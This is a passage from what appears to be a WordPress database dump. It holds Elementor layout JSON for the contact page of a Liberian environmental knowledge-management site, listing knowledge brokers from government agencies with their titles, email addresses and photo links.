Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Assistant Manager - Compliance and Enforcement, ESIA, EPA\\nkawumtoure@gmail.com\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19828,2900,'_elementor_edit_mode','builder'),(19829,2900,'_elementor_template_type','wp-page'),(19830,2900,'_elementor_version','2.7.5'),(19831,2900,'_wp_page_template','default'),(19832,2900,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\